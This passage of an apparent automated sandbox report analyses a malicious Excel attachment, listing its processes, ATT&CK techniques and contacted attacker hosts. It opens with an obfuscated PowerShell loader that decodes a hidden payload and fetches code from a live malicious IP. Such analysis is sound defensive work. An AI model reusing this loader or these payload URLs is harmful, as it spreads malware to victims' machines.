[system.text.encoding'+']::utf8.getstring(e3iimagebytes'+');e3ista'+'rtflag'+' = heu<<base64_start>>heu;e3iendflag ='+' h'+'eu<<base64_end>>heu;e3istartindex = e3iimagetext.indexof(e3istartflag);e3iendindex = e3iimagetext.indexof(e3iendflag);e3istartin'+'dex -ge 0 -and e3iendindex -'+'gt e3istartindex;e3i'+'startindex += e3istart'+'flag.le'+'ngth;e3ibase64length = e3iendindex - e3istartindex;e3'+'ibase64command = e3iimagetext'+'.substring(e3istartindex, e3ibase64length);e3ibase64re'+'v'+'e'+'rsed = -join (e3ibase64command.toch'+'ararray() kui foreach-object { e3i_ })[-1..-(e3ibase64command.length)];e3i'+'com'+'mandbytes = [system.'+'convert]::frombase64string(e'+'3iba'+'se64reversed);e3'+'iloade'+'dassembly = [syste'+'m.r'+'eflection.assembly]::load(e3'+'icommandbytes);e3ivaimethod '+'= [dnlib.io.home].getmethod(heuvaiheu);e3ivaimethod.invoke(e3inull, @(heutxt'+'.mrmac/1231/571.44.271.701//:ptthheu, heudesativadoheu, heudesat'+'ivadoheu, '+'heudesativadoheu, heucaspolheu, heudesativadoheu, heudesativadoheu,he'+'udesativado'+'heu,heudesativadoheu,heudesativadoheu,heudesativadoheu,heudesativadoheu,heu1heu,heud'+'esativadoh'+'eu));').replace(([char]72+[char]101+[char]117),[string][char]39).replace(([char]107+[char]85+[char]105),[string][char]124).replace('e3i','$') )"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	121 Command and Scripting Interpreter	121 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	23 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	4 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Shipping Document.xla.xlsx	21%	ReversingLabs	Win32.Exploit.CVE-2017-0199
Shipping Document.xla.xlsx	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd	0%	Avira URL Cloud	safe
http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIFp	0%	Avira URL Cloud	safe
https://3105.filemail.com/	0%	Avira URL Cloud	safe
http://107.172.44.175/1321/CAMRM.txt	0%	Avira URL Cloud	safe
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_	0%	Avira URL Cloud	safe
http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF	0%	Avira URL Cloud	safe
http://107.172.44.175/1321/seeth	0%	Avira URL Cloud	safe
http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentireti	0%	Avira URL Cloud	safe
http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF:	0%	Avira URL Cloud	safe
http://107.172.44.175/	0%	Avira URL Cloud	safe
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c	0%	Avira URL Cloud	safe
https://3105.filemail.com/api/file/get?filekey=shTPHbC	0%	Avira URL Cloud	safe
https://ljg.cl/	0%	Avira URL Cloud	safe
http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta	0%	Avira URL Cloud	safe
https://3105.filemail.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ip.3105.filemail.com	193.30.119.205	true	true	unknown
ljg.cl	152.231.102.107	true	false	unknown
3105.filemail.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://107.172.44.175/1321/CAMRM.txt	true	Avira URL Cloud: safe	unknown
http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF	true	Avira URL Cloud: safe	unknown
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c	true	Avira URL Cloud: safe	unknown
http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://3105.filemail.com/	powershell.exe, 0000000C.00000002.669105393.000000001A8FE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd	powershell.exe, 0000000E.00000002.572052356.0000000002642000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.533738321.0000000012001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIFp	powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://107.172.44.175/1321/seeth	powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000005.00000002.530318649.0000000003390000.00000004.00000800.00020000.00000000.sdmp	false		high
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_	powershell.exe, 0000000E.00000002.571567594.0000000000278000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.172.44.175/	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentireti	mshta.exe, 00000004.00000003.501201143.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503022942.0000000003336000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.533738321.0000000012001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF:	powershell.exe, 00000005.00000002.529441146.000000000030E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ljg.cl/	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.505717437.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.501201143.0000000000377000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.506606458.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003820000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.530318649.0000000001FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.660953442.0000000002462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.572052356.0000000002441000.00000004.00000800.00020000.00000000.sdmp	false		high
https://3105.filemail.com/api/file/get?filekey=shTPHbC	powershell.exe, 0000000C.00000002.669105393.000000001A8FE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	false		high
http://go.cr	powershell.exe, 00000005.00000002.534757424.000000001C22D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://3105.filemail.com	powershell.exe, 0000000E.00000002.572052356.0000000002642000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.30.119.205	ip.3105.filemail.com	unknown	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	true
152.231.102.107	ljg.cl	Chile	6471	ENTELCHILESACL	false
107.172.44.175	unknown	United States	36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1563179
Start date and time:	2024-11-26 15:47:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Shipping Document.xla.xlsx
Detection:	MAL
Classification:	mal100.phis.expl.evad.winXLSX@26/26@7/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 11 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Execution Graph export aborted for target mshta.exe, PID 3648 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Shipping Document.xla.xlsx

Simulations

Behavior and APIs

Time	Type	Description
09:49:01	API Interceptor	133x Sleep call for process: mshta.exe modified
09:49:09	API Interceptor	361x Sleep call for process: powershell.exe modified
09:49:19	API Interceptor	11x Sleep call for process: wscript.exe modified

LLM Input / Output

Input	Output
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": [] } The provided image does not contain any visible brand logos or brand names. The image appears to be a screenshot of the Microsoft Excel application, which does not display any external brand information. Therefore, there are no brands detected on this page.

URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "brands": [] }
	{ "brands": [] }
URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": [] } The provided image does not contain any visible brand logos or brand names. The image appears to be a screenshot of a blank Microsoft Excel spreadsheet, without any branding or company information displayed.

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "brands": [] }
	{ "brands": [] }
URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": [] }
	{ "brands": [] }
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": [] }
	{ "brands": [] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.30.119.205	creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse
	sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse
	thinkingbestthingswhichcomingetniretimegivenmegood.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse
	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	New RFQ20241142.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse
	Payment Advice.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse
	Order Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse
	OC25-11-24.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse
107.172.44.175	Shipping Document.xls	Get hash	malicious	HTMLPhisher	Browse	107.172.44.175/1311/we/seethebestthingsgoodforentireattitudewhoputonmyheartsheismysweetbebay.hta
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	107.172.44.175/31/RFVGG.txt
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175/431/we/wewalkwaywwithgreatfeaturesmissingforentirelifewithgreatnews.hta

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip.3105.filemail.com	creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	193.30.119.205
	sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	193.30.119.205
	thinkingbestthingswhichcomingetniretimegivenmegood.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	193.30.119.205
	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.30.119.205
	New RFQ20241142.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	193.30.119.205
	Payment Advice.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	193.30.119.205
	Order Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	193.30.119.205
	OC25-11-24.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	193.30.119.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	141.42.102.119
	la.bot.arm5.elf	Get hash	malicious	Mirai	Browse	131.173.120.204
	creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	193.30.119.205
	sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	193.30.119.205
	thinkingbestthingswhichcomingetniretimegivenmegood.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	193.30.119.205
	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.30.119.205
	New RFQ20241142.xls	Get hash	malicious	FormBook, HTMLPhisher	Browse	193.30.119.205
	Payment Advice.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	193.30.119.205
	Order Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	193.30.119.205
	fbot.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	141.14.194.207
AS-COLOCROSSINGUS	sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	104.168.46.26
	thinkingbestthingswhichcomingetniretimegivenmegood.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	198.46.178.192
	Payment Advice.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	198.46.178.192
	Order Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	104.168.46.26
	PO_203-25.exe	Get hash	malicious	Remcos, GuLoader	Browse	192.3.176.134
	Shipping Document.xls	Get hash	malicious	HTMLPhisher	Browse	107.172.44.175
	solicitud de cotizaci#U00f3n..09.xlam.xlsx	Get hash	malicious	Unknown	Browse	104.168.7.19
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.95.140.216
	sora.x86.elf	Get hash	malicious	Mirai	Browse	104.170.219.167
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	192.3.253.172
ENTELCHILESACL	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	11.99.146.111
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	11.126.50.37
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	11.99.66.51
	apep.m68k.elf	Get hash	malicious	Unknown	Browse	11.127.167.41
	apep.sh4.elf	Get hash	malicious	Mirai	Browse	164.77.57.32
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	11.107.244.237
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	11.96.67.142
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	11.101.210.12
